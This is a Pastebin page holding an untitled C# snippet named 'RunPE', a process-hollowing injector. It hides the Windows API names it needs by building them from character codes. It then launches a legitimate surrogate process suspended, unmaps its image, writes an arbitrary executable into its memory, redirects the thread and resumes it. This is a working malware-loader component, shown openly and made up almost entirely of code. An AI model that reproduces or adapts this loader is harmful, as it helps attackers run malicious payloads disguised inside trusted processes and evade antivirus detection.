daily pastebin goal
19%
SHARE
TWEET

Untitled

a guest Feb 23rd, 2018 102 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. RunPE d’oppresor
  2. RunPE d’oppresssor
  3.  
  4. using System.Runtime.InteropServices;
  5. using System;
  6. using System.Text;
  7. public class IX
  8.   {
  9.     [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
  10.     internal static extern IntPtr LoadLibraryA([In, MarshalAs(UnmanagedType.LPStr)] string lpFileName);
  11.     [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
  12.     static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
  13.     delegate bool ESS(string appName, StringBuilder commandLine, IntPtr procAttr, IntPtr thrAttr, [MarshalAs(UnmanagedType.Bool)] bool inherit, int creation, IntPtr env, string curDir, byte[] sInfo, IntPtr[] pInfo);
  14.     delegate bool EXT(IntPtr hThr, uint[] ctxt);
  15.     delegate bool TEX(IntPtr t, uint[] c); //all kernel32
  16.     delegate uint ION(IntPtr hProc, IntPtr baseAddr); //ntdll
  17.     delegate bool ORY(IntPtr hProc, IntPtr baseAddr, ref IntPtr bufr, int bufrSize, ref IntPtr numRead);
  18.     delegate uint EAD(IntPtr hThread); //kernel32.dll
  19.     delegate IntPtr CEX(IntPtr hProc, IntPtr addr, IntPtr size, int allocType, int prot);
  20.     delegate bool CTEX(IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint flNewProtect, ref uint lpflOldProtect);
  21.     delegate bool MOR(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out int lpNumberOfBytesWritten); //kernel32.dll
  22.     delegate bool OP(byte[] bytes, string surrogateProcess);
  23.  
  24.     public T CreateAPI<T>(string name, string method)
  25.     {
  26.     return (T)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(name), method), typeof(T));
  27.     }
  28.     public static bool AA(byte[] bytes, string surrogateProcess)
  29.     {
  30.     IX p = new IX();
  31.     OP F1 = new OP(p.R);
  32.     bool Res = F1(bytes, surrogateProcess);
  33.     return Res;
  34.     }
  35.     public bool R(byte[] bytes, string surrogateProcess)
  36.     {
  37.                 String K32 = Convert.ToString((char)107) + (char)101 + (char)114 + (char)110 + (char)101 + (char)108 + (char)51 + (char)50;
  38.                 String NTD = Convert.ToString((char)110) + (char)116 + (char)100 + (char)108 + (char)108;
  39.     ESS CP = CreateAPI<ESS>(K32, Convert.ToString((char)67) + (char)114 + (char)101 + (char)97 + (char)116 + (char)101 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)65);
  40.     ION NUVS = CreateAPI<ION>(NTD, Convert.ToString((char)78) + (char)116 + (char)85 + (char)110 + (char)109 + (char)97 + (char)112 + (char)86 + (char)105 + (char)101 + (char)119 + (char)79 + (char)102 + (char)83 + (char)101 + (char)99 + (char)116 + (char)105 + (char)111 + (char)110);
  41.     EXT GTC = CreateAPI<EXT>(K32, Convert.ToString((char)71) + (char)101 + (char)116 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100 + (char)67 + (char)111 + (char)110 + (char)116 + (char)101 + (char)120 + (char)116);
  42.     TEX STC = CreateAPI<TEX>(K32, Convert.ToString((char)83) + (char)101 + (char)116 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100 + (char)67 + (char)111 + (char)110 + (char)116 + (char)101 + (char)120 + (char)116);
  43.     ORY RPM = CreateAPI<ORY>(K32, Convert.ToString((char)82) + (char)101 + (char)97 + (char)100 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)77 + (char)101 + (char)109 + (char)111 + (char)114 + (char)121);
  44.     EAD RT = CreateAPI<EAD>(K32, Convert.ToString((char)82) + (char)101 + (char)115 + (char)117 + (char)109 + (char)101 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100);
  45.     CEX VAE = CreateAPI<CEX>(K32, Convert.ToString((char)86) + (char)105 + (char)114 + (char)116 + (char)117 + (char)97 + (char)108 + (char)65 + (char)108 + (char)108 + (char)111 + (char)99 + (char)69 + (char)120);
  46.     CTEX VPE = CreateAPI<CTEX>(K32, Convert.ToString((char)86) + (char)105 + (char)114 + (char)116 + (char)117 + (char)97 + (char)108 + (char)80 + (char)114 + (char)111 + (char)116 + (char)101 + (char)99 + (char)116 + (char)69 + (char)120);
  47.     MOR WPM = CreateAPI<MOR>(K32, Convert.ToString((char)87) + (char)114 + (char)105 + (char)116 + (char)101 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)77 + (char)101 + (char)109 + (char)111 + (char)114 + (char)121);
  48.     try
  49.     {
  50.     IntPtr procAttr = IntPtr.Zero;
  51.     IntPtr[] processInfo = new IntPtr[4];
  52.     byte[] startupInfo = new byte[0x44];
  53.     int num2 = BitConverter.ToInt32(bytes, 60);
  54.     int num = BitConverter.ToInt16(bytes, num2 + 6);
  55.     IntPtr ptr4 = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x54));
  56.     if (CP(null, new StringBuilder(surrogateProcess), procAttr, procAttr, false, 4, procAttr, null, startupInfo, processInfo))
  57.     {
  58.     uint[] ctxt = new uint[0xb3];
  59.     ctxt[0] = 0x10002;
  60.     if (GTC(processInfo[1], ctxt))
  61.     {
  62.     IntPtr baseAddr = new IntPtr(ctxt[0x29] + 8L);
  63.     IntPtr buffer = IntPtr.Zero;
  64.     IntPtr bufferSize = new IntPtr(4);
  65.     IntPtr numRead = IntPtr.Zero;
  66.     if (RPM(processInfo[0], baseAddr, ref buffer, (int)bufferSize, ref numRead) && (NUVS(processInfo[0], buffer) == 0))
  67.     {
  68.     IntPtr addr = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x34));
  69.     IntPtr size = new IntPtr(BitConverter.ToInt32(bytes, num2 + 80));
  70.     IntPtr lpBaseAddress = VAE(processInfo[0], addr, size, 0x3000, 0x40);
  71.     int lpNumberOfBytesWritten;
  72.     WPM(processInfo[0], lpBaseAddress, bytes, (uint)((int)ptr4), out lpNumberOfBytesWritten);
  73.     int num5 = num - 1;
  74.     for (int i = 0; i <= num5; i++)
  75.     {
  76.     int[] dst = new int[10];
  77.     Buffer.BlockCopy(bytes, (num2 + 0xf8) + (i * 40), dst, 0, 40);
  78.     byte[] buffer2 = new byte[(dst[4] - 1) + 1];
  79.     Buffer.BlockCopy(bytes, dst[5], buffer2, Convert.ToInt32(null, 2), buffer2.Length);
  80.     size = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
  81.     addr = new IntPtr(buffer2.Length);
  82.     WPM(processInfo[0], size, buffer2, (uint)addr, out lpNumberOfBytesWritten);
  83.     }
  84.     size = new IntPtr(ctxt[0x29] + 8L);
  85.     addr = new IntPtr(4);
  86.     WPM(processInfo[0], size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint)addr, out lpNumberOfBytesWritten);
  87.     ctxt[0x2c] = (uint)(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40));
  88.     STC(processInfo[1], ctxt);
  89.     }
  90.     }
  91.     RT(processInfo[1]);
  92.     }
  93.     }
  94.     catch
  95.     {
  96.     return false;
  97.     }
  98.     return true;
  99.     }
  100.   }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top